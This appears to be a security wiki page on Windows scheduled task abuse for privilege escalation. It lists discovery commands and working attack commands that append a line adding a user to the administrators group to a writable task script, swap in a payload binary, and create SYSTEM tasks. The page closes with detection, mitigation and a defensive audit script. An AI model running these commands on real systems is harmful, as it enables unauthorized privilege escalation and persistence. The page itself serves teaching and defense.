Scheduled Task Abuse
Overview
Windows Task Scheduler runs programs at defined intervals or in response to events. A task that runs as SYSTEM or another privileged account and executes a script or binary that a lower-privileged user can modify allows privilege escalation. The attack is similar to Linux cron exploitation — if you can modify what a privileged task executes, your code runs with that task's privileges.
ATT&CK Mapping
- Tactic: TA0004 - Privilege Escalation
- Tactic: TA0003 - Persistence
- Technique: T1053.005 - Scheduled Task/Job: Scheduled Task
Prerequisites
- Shell access on the target system
- Scheduled tasks running as a privileged user (SYSTEM, Administrator)
- Write access to the binary, script, or directory referenced by the task
Techniques
Discovery
:: List all scheduled tasks with details
schtasks /query /fo LIST /v
:: Filter for tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr /i "TaskName Run.As Task.To.Run"
:: List tasks in a specific folder
schtasks /query /fo LIST /v /tn "\Microsoft\Windows\*"
# PowerShell
Get-ScheduledTask | Where-Object {$_.State -eq 'Ready'} | Select-Object TaskName, TaskPath
Get-ScheduledTask | ForEach-Object { $_ | Get-ScheduledTaskInfo } | Select-Object TaskName, LastRunTime, NextRunTime
# Tasks running as SYSTEM
Get-ScheduledTask | ForEach-Object {
    $principal = $_.Principal
    if ($principal.UserId -like "*SYSTEM*" -or $principal.UserId -like "*S-1-5-18*") {
        [PSCustomObject]@{
            TaskName = $_.TaskName
            Actions  = ($_.Actions | ForEach-Object { $_.Execute })
            RunAs    = $principal.UserId
        }
    }
}
Writable Task Binaries
If a scheduled task points to a binary or script you can modify:
:: Check permissions on the task's executable
icacls "C:\Path\To\scheduled_script.bat"
icacls "C:\Path\To\scheduled_binary.exe"
:: If writable, inject payload
echo net localgroup administrators <user> /add >> "C:\Path\To\scheduled_script.bat"
:: Or replace the binary entirely
move "C:\Path\To\scheduled_binary.exe" "C:\Path\To\scheduled_binary.exe.bak"
copy payload.exe "C:\Path\To\scheduled_binary.exe"
Writable Task Directory
If the directory containing the task binary is writable, DLL hijacking may be possible:
:: Check directory permissions
icacls "C:\Path\To\"
:: If writable, check DLL search order for the scheduled binary
:: Place a malicious DLL that the binary will load
:: For .bat or .ps1 scripts, check if the script calls commands without full paths
type "C:\Path\To\scheduled_script.bat"
:: If the script calls "backup.exe" without a full path, place your binary first in PATH
Task Modification (Requires Admin)
If you have local admin but need SYSTEM:
:: Create a scheduled task running as SYSTEM
schtasks /create /tn "Escalate" /tr "cmd /c net localgroup administrators <user> /add" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "Escalate"
schtasks /delete /tn "Escalate" /f
# PowerShell — create task as SYSTEM
$action = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c net localgroup administrators <user> /add"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "Escalate" -Action $action -Trigger $trigger -Principal $principal
Start-ScheduledTask -TaskName "Escalate"
Unregister-ScheduledTask -TaskName "Escalate" -Confirm:$false
Detection Methods
Network-Based Detection
- Not directly observable on the network
Host-Based Detection
- Monitor scheduled task creation and modification (Event ID 4698 — task created, 4702 — task updated; both require the "Audit Other Object Access Events" subcategory to be enabled)
- Alert on tasks created with SYSTEM privileges by non-admin processes
- Monitor file modifications in directories referenced by scheduled tasks
- Alert on schtasks /create or Register-ScheduledTask in command-line logging (process creation auditing with command line included, Event ID 4688, or Sysmon Event ID 1)
Mitigation Strategies
- Restrict file permissions — scripts and binaries executed by scheduled tasks should be writable only by Administrators
- Use full paths in scripts — avoid relative paths in scheduled task scripts
- Audit scheduled tasks — regularly review tasks running as SYSTEM for necessity
- Restrict task creation — limit who can create scheduled tasks via Group Policy
- Monitor task changes — enable auditing for scheduled task events
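As an added defensive check for the mitigation points above (not code from the original page), this PowerShell audit enumerates tasks running as SYSTEM or an administrator, resolves each action's executable (including bare names found via PATH, the hijackable case noted under Writable Task Directory), and flags any whose file or containing directory grants write access to broad groups. The group list and the rights mask are assumptions to tune per environment.

```powershell
# Added audit script (not from the original page): flags privileged tasks whose target file or its
# directory is writable by broad, non-admin groups. Run elevated so every task and ACL is readable.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Test-BroadWriteAccess {
    # True when a broad principal holds an Allow ACE carrying write, modify or full-control rights
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Resolve-ActionPath {
    # Strips quotes, expands %SystemRoot%-style variables and resolves bare names through PATH,
    # the case the page flags as hijackable (a script calling backup.exe without a full path)
    param([string]$Execute)
    $exe = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if (-not [IO.Path]::IsPathRooted($exe)) {
        $cmd = Get-Command $exe -ErrorAction SilentlyContinue
        if ($cmd -and $cmd.Source) { $exe = $cmd.Source }
    }
    return $exe
}

Get-ScheduledTask | Where-Object {
    $_.Principal.UserId -match 'SYSTEM|S-1-5-18|Administrator' -or $_.Principal.GroupId -match 'Administrators'
} | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no Execute property
        $exe = Resolve-ActionPath $action.Execute
        if (-not $exe) { continue }
        $dir = Split-Path -Path $exe -Parent
        [PSCustomObject]@{
            Task         = $task.TaskPath + $task.TaskName
            RunAs        = $task.Principal.UserId
            Execute      = $exe
            FileWritable = Test-BroadWriteAccess $exe
            DirWritable  = if ($dir) { Test-BroadWriteAccess $dir } else { $false }
        }
    }
} | Where-Object { $_.FileWritable -or $_.DirWritable } | Format-Table -AutoSize
```

Any row returned is a task whose file permissions should be tightened to Administrators-only, as the first mitigation point describes.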